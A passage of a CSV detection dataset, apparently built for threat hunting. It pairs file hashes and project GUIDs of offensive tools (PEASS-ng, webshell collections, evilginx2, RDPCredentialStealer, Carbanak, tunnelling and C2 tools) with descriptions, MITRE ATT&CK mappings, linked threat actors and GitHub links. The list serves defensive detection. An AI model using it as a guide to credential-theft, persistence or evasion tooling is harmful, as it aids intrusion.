TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24037" "*2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775*",".{0,1000}2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24040" 
"*2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775*",".{0,1000}2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24041" "*2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b*",".{0,1000}2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24045" "*2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b*",".{0,1000}2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24046" "*2eca40d1fd4b3aa09ddc3985141276cfc74b1f885cd3e65dbb7bfde0ef22c033*",".{0,1000}2eca40d1fd4b3aa09ddc3985141276cfc74b1f885cd3e65dbb7bfde0ef22c033.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24047" "*2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c*",".{0,1000}2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24048" "*2ed2e8804392510f60bd52822e068a73fd5be02852694258f88d9dec7917e107*",".{0,1000}2ed2e8804392510f60bd52822e068a73fd5be02852694258f88d9dec7917e107.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24049" "*2ed48bbca6f89e16c2503726e0dfd5cd01a5ec762178a10d598e91a68beec841*",".{0,1000}2ed48bbca6f89e16c2503726e0dfd5cd01a5ec762178a10d598e91a68beec841.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24050" 
"*2edd8774c18c9ba021f29ea142729d82bacf37ef2c58b45f43a7507785670c53*",".{0,1000}2edd8774c18c9ba021f29ea142729d82bacf37ef2c58b45f43a7507785670c53.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","24052" "*2edec08af53d0c00c6c82c90529c6cd22065f668e7daca796c8e783e5c22ed53*",".{0,1000}2edec08af53d0c00c6c82c90529c6cd22065f668e7daca796c8e783e5c22ed53.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24053" "*2ee0ee369247cdd09022301ea9967eb2e6fe70526499c7968a980ef46f2d0645*",".{0,1000}2ee0ee369247cdd09022301ea9967eb2e6fe70526499c7968a980ef46f2d0645.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24054" 
"*2ee22d22298209b3f5114b4f64a067d1933477b6c5259e28cf8f8d387450cb7b*",".{0,1000}2ee22d22298209b3f5114b4f64a067d1933477b6c5259e28cf8f8d387450cb7b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24056" "*2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4*",".{0,1000}2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24057" "*2ee7f67057652ae099d25d96acc90bae127af618a0409fc2a603e6382cbfedcd*",".{0,1000}2ee7f67057652ae099d25d96acc90bae127af618a0409fc2a603e6382cbfedcd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24058" "*2ee991b61ed7a2831541079d85b4048128f5964ad70f03940365ad4607cc2da9*",".{0,1000}2ee991b61ed7a2831541079d85b4048128f5964ad70f03940365ad4607cc2da9.{0,1000}","offensive_tool_keyword","nps","chinese intranet 
penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24059" "*2eeba6742b716b69144db95b0240d6d7a50d48f28f2dec83b003e74ff4958ad1*",".{0,1000}2eeba6742b716b69144db95b0240d6d7a50d48f28f2dec83b003e74ff4958ad1.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","24060" "*2eec07fa568311a385f0e0b9a26b1244901efe0403163bd79d1247d1b4e38c9d*",".{0,1000}2eec07fa568311a385f0e0b9a26b1244901efe0403163bd79d1247d1b4e38c9d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24061" "*2eeed72ee86a276b08351436a84e2d3c3e8ec3eda25f8207b9c5878bb7541764*",".{0,1000}2eeed72ee86a276b08351436a84e2d3c3e8ec3eda25f8207b9c5878bb7541764.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24062" 
"*2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c*",".{0,1000}2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24063" "*2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c*",".{0,1000}2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24064" "*2ef48f44bff3ba1d7d63959971a7b04f2294fb0e8926beab26692e5f2f361d44*",".{0,1000}2ef48f44bff3ba1d7d63959971a7b04f2294fb0e8926beab26692e5f2f361d44.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24065" "*2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212*",".{0,1000}2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24066" "*2efa21402a699dfc1777d30a71a6532c6188ba867088d8e50ae3bfbeb873992c*",".{0,1000}2efa21402a699dfc1777d30a71a6532c6188ba867088d8e50ae3bfbeb873992c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24068" "*2f00562c23c765a32f3e1b39da4aae0db8cf0d47e19c800bba2678c7be198503*",".{0,1000}2f00562c23c765a32f3e1b39da4aae0db8cf0d47e19c800bba2678c7be198503.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24071" 
"*2F00A05B-263D-4FCC-846B-DA82BD684603*",".{0,1000}2F00A05B\-263D\-4FCC\-846B\-DA82BD684603.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#GUIDproject","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","24072" "*2F00A05B-263D-4FCC-846B-DA82BD684603*",".{0,1000}2F00A05B\-263D\-4FCC\-846B\-DA82BD684603.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24073" "*2f00a05b-263d-4fcc-846b-da82bd684603*",".{0,1000}2f00a05b\-263d\-4fcc\-846b\-da82bd684603.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","24074" "*2f07406d517a0f5b8b4e46ecb1ef412924abf1bd43c451ed324f5a23e2d9e2de*",".{0,1000}2f07406d517a0f5b8b4e46ecb1ef412924abf1bd43c451ed324f5a23e2d9e2de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24075" "*2f1eb89e5ddbc2a72831e7ac58e9cc823d408affa6f60a35c559bddabd6eb16f*",".{0,1000}2f1eb89e5ddbc2a72831e7ac58e9cc823d408affa6f60a35c559bddabd6eb16f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24076" "*2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba*",".{0,1000}2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24079" "*2f270dfe3ae3f96ea722d7a164f048f7501031664db91bb799e44c13856aa86e*",".{0,1000}2f270dfe3ae3f96ea722d7a164f048f7501031664db91bb799e44c13856aa86e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24080" "*2f29ef1160800ac8190ccf6ab09e546fc35a2aaa66b70393a9256a765d46fb46*",".{0,1000}2f29ef1160800ac8190ccf6ab09e546fc35a2aaa66b70393a9256a765d46fb46.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24081" "*2f3c1b3378d19418aa4c99685f3ab9d6730c132a920946b64c0e4edc9efd5ed6*",".{0,1000}2f3c1b3378d19418aa4c99685f3ab9d6730c132a920946b64c0e4edc9efd5ed6.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","24085" "*2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77*",".{0,1000}2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","#filehash","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","24087" "*2f48cac314397716defc882e1040bba75ea54507aae551a64f67ce21e7d649c5*",".{0,1000}2f48cac314397716defc882e1040bba75ea54507aae551a64f67ce21e7d649c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24089" "*2f4fd04bbf02ef75845bfb287e5abc4fb7ae9a81776142b573eadadbf28fbe81*",".{0,1000}2f4fd04bbf02ef75845bfb287e5abc4fb7ae9a81776142b573eadadbf28fbe81.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24091" "*2f511fc2e09cb09ff9711958973b513316e75827c85d1b787c7f8befc580c0f3*",".{0,1000}2f511fc2e09cb09ff9711958973b513316e75827c85d1b787c7f8befc580c0f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24092" "*2f5d68c11ab2e44b398b3ca6820c5ecf91bc6e490418f4e2c6ce20bef7f8ff80*",".{0,1000}2f5d68c11ab2e44b398b3ca6820c5ecf91bc6e490418f4e2c6ce20bef7f8ff80.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24096" "*2f64baa9a60ff7e4114c278a8538dc6807c52b5aed17a158cd6e4bbc89df93e3*",".{0,1000}2f64baa9a60ff7e4114c278a8538dc6807c52b5aed17a158cd6e4bbc89df93e3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24097" "*2f66770e5243fc4bba4b3f8e15a093fb8d433909345033a7481e744ca24a4196*",".{0,1000}2f66770e5243fc4bba4b3f8e15a093fb8d433909345033a7481e744ca24a4196.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24098" "*2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7*",".{0,1000}2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#filehash","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24099" 
"*2f77333c8b958d992eb2bbbdca80efd3a90f95a45c1b9738d16ee8e0a0f3c3f8*",".{0,1000}2f77333c8b958d992eb2bbbdca80efd3a90f95a45c1b9738d16ee8e0a0f3c3f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24103" "*2f8836f78e6c809950f78fc35d75068f7d5c206947ab009fb7b3c17315f0aded*",".{0,1000}2f8836f78e6c809950f78fc35d75068f7d5c206947ab009fb7b3c17315f0aded.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24105" "*2F8E74D2-3474-408C-9469-A4E3C97B7BBF*",".{0,1000}2F8E74D2\-3474\-408C\-9469\-A4E3C97B7BBF.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24106" "*2f8ed85860e64bd52c6ef3b7a4e405a9934ca78139751adb118a0074ae7ced2d*",".{0,1000}2f8ed85860e64bd52c6ef3b7a4e405a9934ca78139751adb118a0074ae7ced2d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","24107" "*2f9b03c897526749ff4fefbeec1eb89fcc5c303867bcbfa40ed7257c77dd001b*",".{0,1000}2f9b03c897526749ff4fefbeec1eb89fcc5c303867bcbfa40ed7257c77dd001b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24109" "*2f9b32300b30c7a70e5fc37adae993bd93b35d6e13b90eebb375e1718a991058*",".{0,1000}2f9b32300b30c7a70e5fc37adae993bd93b35d6e13b90eebb375e1718a991058.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24110" 
